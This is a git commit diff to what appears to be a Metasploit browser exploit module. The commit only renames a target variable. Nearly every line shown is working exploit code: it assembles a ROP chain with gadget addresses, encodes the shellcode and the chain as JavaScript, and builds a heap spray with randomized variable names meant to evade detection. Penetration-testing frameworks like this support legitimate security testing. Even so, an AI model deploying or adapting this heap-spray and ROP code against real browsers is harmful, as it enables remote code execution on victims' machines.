Fix broken target (variable naming)

sinn3r 2012-05-17 11:37:49 -05:00
parent 2fccf4674f
commit 952ada1742
1 changed files with 8 additions and 8 deletions


@ -184,7 +184,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
# Create the payload
print_status("Creating payload for #{target.name}")
print_status("Creating payload for #{my_target.name}")
table =
[
0x0c0c0c0c, # index
@ -194,15 +194,15 @@ class Metasploit3 < Msf::Exploit::Remote
].pack("V*")
rop = rand_text_alpha_upper(56)
rop << [ target['PopEax'] ].pack("V")
rop << [ my_target['PopEax'] ].pack("V")
rop << rand_text_alpha_upper(40)
rop << get_rop_chain(target['FF'],target['OS'])
rop << get_rop_chain(my_target['FF'],my_target['OS'])
# Encode table, chain and payload
rop_js = Rex::Text.to_unescape(table+rop, Rex::Arch.endian(target.arch))
rop_js = Rex::Text.to_unescape(table+rop, Rex::Arch.endian(my_target.arch))
code = payload.encoded
code_js = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))
code_js = Rex::Text.to_unescape(code, Rex::Arch.endian(my_target.arch))
# random JavaScript variable names
i_name = rand_text_alpha(rand(10) + 5)
@ -240,7 +240,7 @@ class Metasploit3 < Msf::Exploit::Remote
var #{rop_name} = unescape("#{rop_js}");
var #{code_name} = unescape("#{code_js}");
var #{offset_length_name} = #{target['OffSet']};
var #{offset_length_name} = #{my_target['OffSet']};
for (var #{i_name}=0; #{i_name} < 0x300; #{i_name}++)
{
@ -261,9 +261,9 @@ class Metasploit3 < Msf::Exploit::Remote
var #{single_sprayblock_name} = #{junk_offset_name} + #{rop_name} + #{code_name};
#{single_sprayblock_name} += #{padding_name}.substring(0,0x800 - #{offset_length_name} - #{rop_name}.length - #{code_name}.length);
while (#{single_sprayblock_name}.length < #{target['Size']}) #{single_sprayblock_name} += #{single_sprayblock_name};
while (#{single_sprayblock_name}.length < #{my_target['Size']}) #{single_sprayblock_name} += #{single_sprayblock_name};
#{sprayblock_name} = #{single_sprayblock_name}.substring(0, (#{target['Size']}-6)/2);
#{sprayblock_name} = #{single_sprayblock_name}.substring(0, (#{my_target['Size']}-6)/2);
#{varname_name} = "var" + #{randnum1_name}.toString() + #{randnum2_name}.toString();
#{varname_name} += #{randnum3_name}.toString() + #{randnum4_name}.toString() + #{i_name}.toString();